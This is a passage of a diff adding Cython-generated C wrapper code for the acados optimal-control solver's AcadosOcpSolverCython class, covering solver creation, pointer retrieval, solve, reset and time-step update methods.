__pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_model_name, __pyx_v_nlp_solver_type, __pyx_v_N); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython___cinit__(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_model_name, PyObject *__pyx_v_nlp_solver_type, PyObject *__pyx_v_N) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":76 + * def __cinit__(self, model_name, nlp_solver_type, N): + * + * self.solver_created = False # <<<<<<<<<<<<<< + * + * self.N = N + */ + __pyx_v_self->solver_created = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":78 + * self.solver_created = False + * + * self.N = N # <<<<<<<<<<<<<< + * self.model_name = model_name + * self.nlp_solver_type = nlp_solver_type + */ + __pyx_t_1 = __Pyx_PyInt_As_int(__pyx_v_N); if (unlikely((__pyx_t_1 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 78, __pyx_L1_error) + __pyx_v_self->N = __pyx_t_1; + + /* "acados_template/acados_ocp_solver_pyx.pyx":79 + * + * self.N = N + * self.model_name = model_name # <<<<<<<<<<<<<< + * self.nlp_solver_type = nlp_solver_type + * + */ + if (!(likely(PyUnicode_CheckExact(__pyx_v_model_name))||((__pyx_v_model_name) == Py_None) || __Pyx_RaiseUnexpectedTypeError("unicode", __pyx_v_model_name))) __PYX_ERR(0, 79, __pyx_L1_error) + __pyx_t_2 = __pyx_v_model_name; + __Pyx_INCREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_v_self->model_name); + __Pyx_DECREF(__pyx_v_self->model_name); + __pyx_v_self->model_name = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":80 + * self.N = N + * self.model_name = model_name + * self.nlp_solver_type = nlp_solver_type # <<<<<<<<<<<<<< + * + * # create capsule + */ + if (!(likely(PyUnicode_CheckExact(__pyx_v_nlp_solver_type))||((__pyx_v_nlp_solver_type) == Py_None) || __Pyx_RaiseUnexpectedTypeError("unicode", __pyx_v_nlp_solver_type))) __PYX_ERR(0, 80, __pyx_L1_error) + __pyx_t_2 = __pyx_v_nlp_solver_type; + __Pyx_INCREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_v_self->nlp_solver_type); + __Pyx_DECREF(__pyx_v_self->nlp_solver_type); + __pyx_v_self->nlp_solver_type = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":83 + * + * # create capsule + * self.capsule = acados_solver.acados_create_capsule() # <<<<<<<<<<<<<< + * + * # create solver + */ + __pyx_v_self->capsule = long_acados_create_capsule(); + + /* "acados_template/acados_ocp_solver_pyx.pyx":86 + * + * # create solver + * assert acados_solver.acados_create(self.capsule) == 0 # <<<<<<<<<<<<<< + * self.solver_created = True + * + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_3 = (long_acados_create(__pyx_v_self->capsule) == 0); + if (unlikely(!__pyx_t_3)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 86, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 86, __pyx_L1_error) + #endif + + /* "acados_template/acados_ocp_solver_pyx.pyx":87 + * # create solver + * assert acados_solver.acados_create(self.capsule) == 0 + * self.solver_created = True # <<<<<<<<<<<<<< + * + * # get pointers solver + */ + __pyx_v_self->solver_created = 1; + + /* "acados_template/acados_ocp_solver_pyx.pyx":90 + * + * # get pointers solver + * self.__get_pointers_solver() # <<<<<<<<<<<<<< + * self.status = 0 + * + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_AcadosOcpSolverCython__get_poin); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_1 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_1 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_5, }; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_1, 0+__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":91 + * # get pointers solver + * self.__get_pointers_solver() + * self.status = 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_self->status = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":74 + * cdef str nlp_solver_type + * + * def __cinit__(self, model_name, nlp_solver_type, N): # <<<<<<<<<<<<<< + * + * self.solver_created = False + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":94 + * + * + * def __get_pointers_solver(self): # <<<<<<<<<<<<<< + * """ + * Private function to get the pointers for solver + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver, "\n Private function to get the pointers for solver\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver = {"_AcadosOcpSolverCython__get_pointers_solver", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_pointers_solver (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_pointers_solver", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "_AcadosOcpSolverCython__get_pointers_solver", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_pointers_solver", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":99 + * """ + * # get pointers solver + * self.nlp_opts = acados_solver.acados_get_nlp_opts(self.capsule) # <<<<<<<<<<<<<< + * self.nlp_dims = acados_solver.acados_get_nlp_dims(self.capsule) + * self.nlp_config = acados_solver.acados_get_nlp_config(self.capsule) + */ + __pyx_v_self->nlp_opts = long_acados_get_nlp_opts(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":100 + * # get pointers solver + * self.nlp_opts = acados_solver.acados_get_nlp_opts(self.capsule) + * self.nlp_dims = acados_solver.acados_get_nlp_dims(self.capsule) # <<<<<<<<<<<<<< + * self.nlp_config = acados_solver.acados_get_nlp_config(self.capsule) + * self.nlp_out = acados_solver.acados_get_nlp_out(self.capsule) + */ + __pyx_v_self->nlp_dims = long_acados_get_nlp_dims(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":101 + * self.nlp_opts = acados_solver.acados_get_nlp_opts(self.capsule) + * self.nlp_dims = acados_solver.acados_get_nlp_dims(self.capsule) + * self.nlp_config = acados_solver.acados_get_nlp_config(self.capsule) # <<<<<<<<<<<<<< + * self.nlp_out = acados_solver.acados_get_nlp_out(self.capsule) + * self.sens_out = acados_solver.acados_get_sens_out(self.capsule) + */ + __pyx_v_self->nlp_config = long_acados_get_nlp_config(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":102 + * self.nlp_dims = acados_solver.acados_get_nlp_dims(self.capsule) + * self.nlp_config = acados_solver.acados_get_nlp_config(self.capsule) + * self.nlp_out = acados_solver.acados_get_nlp_out(self.capsule) # <<<<<<<<<<<<<< + * self.sens_out = acados_solver.acados_get_sens_out(self.capsule) + * self.nlp_in = acados_solver.acados_get_nlp_in(self.capsule) + */ + __pyx_v_self->nlp_out = long_acados_get_nlp_out(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":103 + * self.nlp_config = acados_solver.acados_get_nlp_config(self.capsule) + * self.nlp_out = acados_solver.acados_get_nlp_out(self.capsule) + * self.sens_out = acados_solver.acados_get_sens_out(self.capsule) # <<<<<<<<<<<<<< + * self.nlp_in = acados_solver.acados_get_nlp_in(self.capsule) + * self.nlp_solver = acados_solver.acados_get_nlp_solver(self.capsule) + */ + __pyx_v_self->sens_out = long_acados_get_sens_out(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":104 + * self.nlp_out = acados_solver.acados_get_nlp_out(self.capsule) + * self.sens_out = acados_solver.acados_get_sens_out(self.capsule) + * self.nlp_in = acados_solver.acados_get_nlp_in(self.capsule) # <<<<<<<<<<<<<< + * self.nlp_solver = acados_solver.acados_get_nlp_solver(self.capsule) + * + */ + __pyx_v_self->nlp_in = long_acados_get_nlp_in(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":105 + * self.sens_out = acados_solver.acados_get_sens_out(self.capsule) + * self.nlp_in = acados_solver.acados_get_nlp_in(self.capsule) + * self.nlp_solver = acados_solver.acados_get_nlp_solver(self.capsule) # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_self->nlp_solver = long_acados_get_nlp_solver(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":94 + * + * + * def __get_pointers_solver(self): # <<<<<<<<<<<<<< + * """ + * Private function to get the pointers for solver + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":108 + * + * + * def solve(self): # <<<<<<<<<<<<<< + * """ + * Solve the ocp with current input. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve, "\n Solve the ocp with current input.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve = {"solve", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("solve (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("solve", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "solve", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("solve", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":112 + * Solve the ocp with current input. + * """ + * return acados_solver.acados_solve(self.capsule) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(long_acados_solve(__pyx_v_self->capsule)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 112, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":108 + * + * + * def solve(self): # <<<<<<<<<<<<<< + * """ + * Solve the ocp with current input. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.solve", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":115 + * + * + * def reset(self): # <<<<<<<<<<<<<< + * """ + * Sets current iterate to all zeros. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset, "\n Sets current iterate to all zeros.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset = {"reset", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("reset (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("reset", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "reset", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("reset", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":119 + * Sets current iterate to all zeros. + * """ + * return acados_solver.acados_reset(self.capsule) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(long_acados_reset(__pyx_v_self->capsule)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 119, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":115 + * + * + * def reset(self): # <<<<<<<<<<<<<< + * """ + * Sets current iterate to all zeros. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.reset", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":122 + * + * + * def set_new_time_steps(self, new_time_steps): # <<<<<<<<<<<<<< + * """ + * Set new time steps. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps, "\n Set new time steps.\n Recreates the solver if N changes.\n\n :param new_time_steps: 1 dimensional np array of new time steps for the solver\n\n .. note:: This allows for different use-cases: either set a new size of time-steps or a new distribution of\n the shooting nodes without changing the number, e.g., to reach a different final time. Both cases\n do not require a new code export and compilation.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps = {"set_new_time_steps", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v_new_time_steps = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_new_time_steps (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_new_time_steps,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_new_time_steps)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 122, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "set_new_time_steps") < 0)) __PYX_ERR(0, 122, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_new_time_steps = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("set_new_time_steps", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 122, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.set_new_time_steps", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_new_time_steps); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_new_time_steps) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("set_new_time_steps", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":134 + * """ + * + * raise NotImplementedError("AcadosOcpSolverCython: does not support set_new_time_steps() since it is only a prototyping feature") # <<<<<<<<<<<<<< + * # # unlikely but still possible + * # if not self.solver_created: + */ + __pyx_t_1 = __Pyx_PyObject_Call(__pyx_builtin_NotImplementedError, __pyx_tuple__11, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 134, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 134, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":122 + * + * + * def set_new_time_steps(self, new_time_steps): # <<<<<<<<<<<<<< + * """ + * Set new time steps. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.set_new_time_steps", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":173 + * + * + * def update_qp_solver_cond_N(self, qp_solver_cond_N: int): # <<<<<<<<<<<<<< + * """ + * Recreate solver with new value `qp_solver_cond_N` with a partial condensing QP solver. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N, "\n Recreate solver with new value `qp_solver_cond_N` with a partial condensing QP solver.\n This function is relevant for code reuse, i.e., if either `set_new_time_steps(...)` is used or\n the influence of a different `qp_solver_cond_N` is studied without code export and compilation.\n :param qp_solver_cond_N: new number of condensing stages for the solver\n\n .. note:: This function can only be used in combination with a partial condensing QP solver.\n\n .. note:: After `set_new_time_steps(...)` is used and depending on the new number of time steps it might be\n necessary to change `qp_solver_cond_N` as well (using this function), i.e., typically\n `qp_solver_cond_N < N`.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N = {"update_qp_solver_cond_N", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v_qp_solver_cond_N = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const 